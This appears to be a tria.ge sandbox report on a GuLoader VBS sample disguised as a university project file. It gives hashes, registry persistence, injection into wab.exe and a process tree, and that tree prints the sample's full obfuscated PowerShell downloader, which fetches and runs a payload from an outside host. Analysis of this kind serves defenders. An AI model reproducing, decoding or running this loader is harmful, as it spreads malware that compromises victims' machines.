Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
13/02/2024, 04:33
Static task
static1
Behavioral task
behavioral1
Sample
Abu Dhabi University_project_334568.vbs
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Abu Dhabi University_project_334568.vbs
Resource
win10v2004-20231215-en
General
-
Target
Abu Dhabi University_project_334568.vbs
-
Size
36KB
-
MD5
de8bb4e7b3b42adcc01eaf37409ba15a
-
SHA1
77e869d2cdb86aea090f14a444e0d1ee39e5cd68
-
SHA256
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001
-
SHA512
5258eaf86e2da5799b8d4c73c5b7047502d7e66000bef6b6680aafc931c7590eb005917c9af4c8a788ee16638870354c3f044434d381b934f5ada38c09a48569
-
SSDEEP
768:vUJZmkTEmGkXZwCwzWfMKjWcHISdD0i6z2l+KaRB0e:cJLEXM9wzPKjXHISJ0i6z2w/f
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds policy Run key to start application 2 TTPs 1 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-1603059206-2004189698-4139800220-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run SyncHost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows\CurrentVersion\Run\W2J84PJP = "C:\\Program Files (x86)\\windows mail\\wab.exe" SyncHost.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2848 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2700 powershell.exe 2848 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2700 set thread context of 2848 2700 powershell.exe 38 PID 2848 set thread context of 1364 2848 wab.exe 17 PID 2848 set thread context of 1068 2848 wab.exe 41 PID 1068 set thread context of 1364 1068 SyncHost.exe 17 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 2656 powershell.exe 2700 powershell.exe 2848 wab.exe 2848 wab.exe 2848 wab.exe 2848 wab.exe 2848 wab.exe 2848 wab.exe 2848 wab.exe 2848 wab.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe 1068 SyncHost.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 2700 powershell.exe 2848 wab.exe 1364 Explorer.EXE 1364 Explorer.EXE 1068 SyncHost.exe 1068 SyncHost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2132 wrote to memory of 2656 2132 WScript.exe 28 PID 2132 wrote to memory of 2656 2132 WScript.exe 28 PID 2132 wrote to memory of 2656 2132 WScript.exe 28 PID 2656 wrote to memory of 2572 2656 powershell.exe 30 PID 2656 wrote to memory of 2572 2656 powershell.exe 30 PID 2656 wrote to memory of 2572 2656 powershell.exe 30 PID 2572 wrote to memory of 2708 2572 cmd.exe 31 PID 2572 wrote to memory of 2708 2572 cmd.exe 31 PID 2572 wrote to memory of 2708 2572 cmd.exe 31 PID 2656 wrote to memory of 2700 2656 powershell.exe 33 PID 2656 wrote to memory of 2700 2656 powershell.exe 33 PID 2656 wrote to memory of 2700 2656 powershell.exe 33 PID 2656 wrote to memory of 2700 2656 powershell.exe 33 PID 2700 wrote to memory of 2608 2700 powershell.exe 34 PID 2700 wrote to memory of 2608 2700 powershell.exe 34 PID 2700 wrote to memory of 2608 2700 powershell.exe 34 PID 2700 wrote to memory of 2608 2700 powershell.exe 34 PID 2608 wrote to memory of 2640 2608 cmd.exe 35 PID 2608 wrote to memory of 2640 2608 cmd.exe 35 PID 2608 wrote to memory of 2640 2608 cmd.exe 35 PID 2608 wrote to memory of 2640 2608 cmd.exe 35 PID 2700 wrote to memory of 2848 2700 powershell.exe 38 PID 2700 wrote to memory of 2848 2700 powershell.exe 38 PID 2700 wrote to memory of 2848 2700 powershell.exe 38 PID 2700 wrote to memory of 2848 2700 powershell.exe 38 PID 2700 wrote to memory of 2848 2700 powershell.exe 38 PID 2700 wrote to memory of 2848 2700 powershell.exe 38 PID 1364 wrote to memory of 1068 1364 Explorer.EXE 41 PID 1364 wrote to memory of 1068 1364 Explorer.EXE 41 PID 1364 wrote to memory of 1068 1364 Explorer.EXE 41 PID 1364 wrote to memory of 1068 1364 Explorer.EXE 41
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Abu Dhabi University_project_334568.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"4⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\tzutil.exetzutil /l5⤵PID:2708
-
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"5⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\tzutil.exetzutil /l6⤵PID:2640
-
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2848
-
-
-
-
-
C:\Windows\SysWOW64\SyncHost.exe"C:\Windows\SysWOW64\SyncHost.exe"2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1068
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0WB0IJ344CML0SMZU3ZX.temp
Filesize7KB
MD5cdb0fb153e9d5730580b12d82faf8421
SHA13d369b56f01d942356c40d15784eb5a6c84cc1f0
SHA2568968fc87750577f523c1386c097d9ab44975a28ad72c72f76b68e0cc99b456a5
SHA512e2bb97f99b3468ad5b6756ee2facbcc34958fdec5a2c59719969491a95e27fda8397c454509c44d13cd2694d4b2979d140fcf169eb1507dfb5b7e1f0cd264935